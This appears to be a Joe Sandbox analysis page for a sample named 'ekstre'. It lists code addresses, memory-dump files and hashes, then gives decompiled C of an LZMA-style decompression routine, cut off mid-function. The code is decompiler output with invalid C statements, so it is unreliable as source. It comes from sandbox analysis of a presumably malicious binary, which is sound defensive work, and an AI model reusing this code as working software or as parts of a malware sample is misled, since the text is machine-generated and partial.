0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c5e
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x0040754e
0x00000000
0x0040754e
0x00406ca8
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd2
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x0040755d
0x00000000
0x0040755d
0x00406d18
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075cf
0x00000000
0x004075cf
0x00407426
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00000000
0x00000000
0x00406d5f
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00406ffe
0x00407002
0x00407020
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x0040711c
0x00407120
0x00407127
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00407122
0x00000000
0x00000000
0x00407143
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407395
0x00407399
0x004073bb
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x0040739b
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00407490
0x00407493
0x0040749a
0x00000000
0x0040749d
0x00407458
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407543
0x00407546
0x00407447
0x00407447
0x00407447
0x00000000
0x0040744d
0x00000000
0x0040717d
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x0040749d
0x00000000
0x00000000
0x00000000
0x004071c2
0x004071c2
0x004071c5
0x004071fb
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x004075bd
0x00000000
0x004075bd
0x00407339
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725b
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004074c7
0x00407490

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
